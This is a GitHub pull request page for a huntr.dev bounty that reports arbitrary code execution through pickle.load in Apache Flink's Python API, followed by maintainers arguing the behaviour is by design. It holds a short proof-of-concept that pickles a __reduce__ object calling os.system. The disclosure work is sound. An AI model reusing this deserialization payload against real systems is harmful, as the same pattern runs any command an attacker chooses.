Skip to content
This repository has been archived by the owner on Dec 19, 2023. It is now read-only.

Fixed Arbitrary Code Execution by pickle.load #1

Open
wants to merge 9 commits into
base: master
Choose a base branch
from

Conversation

B3EF
Copy link

@B3EF B3EF commented Jan 30, 2021

📊 Metadata *

Fix for Arbitrary Code Execution

Bounty URL:https://www.huntr.dev/bounties/1-pip-apache-flink

⚙️ Description *

Apache Flink is an open source stream processing framework with powerful stream- and batch-processing capabilities.

💻 Technical Description *

Vulnerability description untrusted loading of data by the pickle.load function leading to Arbitrary code execution.

🐛 Proof of Concept (POC) *

run the exploit below

import os
import pickle
#os.system('pip3 install apache-flink')
from pyflink.fn_execution import operation_utils
#payload formation
class ArbitraryCode:
    def __reduce__(self):
        cmd = ('xcalc')
        return os.system, (cmd,)
dumps = pickle.dumps(ArbitraryCode())
operation_utils.load_aggregate_function(dumps)

Screenshot from 2021-01-30 20-28-16

🔥 Proof of Fix (PoF) *

Screenshot from 2021-01-30 22-24-42

👍 User Acceptance Testing (UAT)

The library has been successfully tested

huntr-helper pushed a commit to 418sec/huntr that referenced this pull request Jan 30, 2021
@huntr-helper
Copy link

👋 Hello, @tillrohrmann - @B3EF has opened a PR to us with a fix for a potential vulnerability in your repository. To view the vulnerability, please refer to the bounty URL in the first comment, above.

Ultimately, you get to decide if the fix is 👍 or 👎. If you are happy with the fix, please write a new comment (@huntr-helper - LGTM) and we will open a PR to your repository with the fix. All remaining PRs for this vulnerability will be automatically closed.

If you have any questions or need support, come and join us on our community Discord!

@tillrohrmann & @B3EF - thank you for your efforts in securing the world’s open source code! 🎉

@tillrohrmann
Copy link

tillrohrmann commented Feb 2, 2021

Thanks for creating this fix @B3EF.

I am not entirely sure whether this is really an exploit because Flink is designed to execute arbitrary code in parallel fashion. Hence, it is a bit the responsibility of the user to make sure that his code does the right things. For example, using the Java API you can also call System.exit().

Moreover, we need to be able to execute code from arbitrary Python libraries whose module names we don't know upfront.

I am also pulling in @dianfu who works on Flink's Python API for a second opinion.

Feel free to disagree.

@dianfu
Copy link

dianfu commented Feb 3, 2021

Thanks a lot for the fix @B3EF and thanks @tillrohrmann for the ping. I agree with @tillrohrmann and also tend to think this is by design and should not be a problem.

Flink allows users to execute arbitrary code. Users could define user-defined functions in Java/Scala/Python languages in Flink, see [1] and [2] for more details. There are no limitations on what users could do in the user-defined functions and this is the same case for all kinds of user-defined functions in Flink (I think this is also the behavior shared by most projects, such as Spark, Beam, etc).

Sign up for free to subscribe to this conversation on GitHub. Already have an account? Sign in.
Labels
None yet
Projects
None yet
Development

Successfully merging this pull request may close these issues.

4 participants